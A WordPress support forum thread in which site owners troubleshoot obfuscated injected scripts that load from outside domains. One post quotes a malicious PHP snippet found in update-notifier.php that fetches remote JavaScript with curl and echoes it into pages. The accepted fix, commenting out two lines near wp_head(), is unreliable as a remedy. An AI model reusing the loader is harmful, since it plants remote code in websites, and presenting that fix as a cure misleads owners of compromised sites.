I’m having the same problem. I already used sucuri.net to check but it didn’t find anything but still getting the error. I checked Page Source from my browser and there are 2 encrypted scripts above the ending header tag, but it’s not in header.php.
The 2 scripts have “eval(unescape” at the beginning and when page is loading in the status bar appears 2 sites: wscripts.org and jquerey.com
Also when inspecting with Firebug the loaded scripts there are 2 called pop.js and imwb_cab_script.js.
Question is how to remove these codes that appear in the browser page source.
You can see the encrypted scripts here
Any other solution on how to get rid these codes?
Thanks!
Yes! I am getting the same thing. I found some malware code before and removed it but this is a new thing and it’s really screwing with my traffic. I can’t find where the string of code is to save my life. I’ve searched my whole server.
which malware code did you find and remove. Could you please write it. Which theme are you using?
Moderator
Jan Dembowski
(@jdembowski)
Forum Moderator and Brute Squad
Hm… I think the malware code’s no concern of this situation.
Because the error notice is seem look like this, so it is maybe a problem with jquery. I think so. BTW, i use the Good-minimal theme.
The other topic but same problem is posted here.
Hoping for the solution.
I think it is related to some themes if you make a google search, there are several wp sites with this problem. After changing the theme the problem disappear but the best is to know how to get rid of it with whatever theme.
OK, just got this also over the last few days. Seems a few cases have been reported.
If I were a guessing man I’d say you have this:
http://labs.sucuri.net/db/malware/mwjs-evalunesc-wscripts?v1
BTW, I’m still sifting through my site. Haven’t found the culprit. It’s not index.php.
Oh and I’d guess you’ve had it for a while. The reason why you’re seeing the errors is because wscripts.org was/is down hence all those cookie collection scripts were throwing errors.
Good point ichpen, also there is anothe code called imwb_cab_script.js
[IMG]http://i47.tinypic.com/dpww3b.jpg[/IMG]
As you can see it is from a plugin installed in wscripts called convertactionbar-pro.
As it says in sucuri.net report “Malware is hidden at the index.php or index.html files”, how can we find it if all code seems to be ok, apparently.
What these scripts do? see here jsunpack.jeek.org/?report=5d8ae442e40470d7ae06a58ea08d8e412110992b
any idea??
I was having this problem but seem to have fixed it. I read somewhere to comment out
<?php
if(function_exists('curl_init'))
{
$url = "http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
?>
I tried that, but it just caused a lot more problems. That piece of code was in my update-notifier.php file so I ended up just grabbing the original from my rar file and it cleared everything up. Hope this helps
I think I found a fix: reading a topic “Malware in header.php” in wordpress.stackexchange.com someone found a code just above wp_head() and cleaned the code but this reappeared after a few hours.
I looked for something similar but found nothing suspicious.
Just in case I commented 2 lines above wp_head() like this
<!-- <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<?php if ( is_singular() ) wp_enqueue_script( 'comment-reply' ); ?> -->
Then reloaded the sites several times and now seems to be ok: no message, no encrypted script when seeing page source, no wscripts.org trying to load, etc. Now the site even loads faster.
I made some secure fixes too.
If happend again, I’ll let you know.
Hope that this may be useful for someone in similar situation.
Okay, Miguel Alas. Seem you got the right solution. My site works well again, and of course i reloaded many times. No more error.
I will let this topic open for a little time to test before mark this as resolved.
Thank you!
Nice to know that sagitt000, you’re welcome.
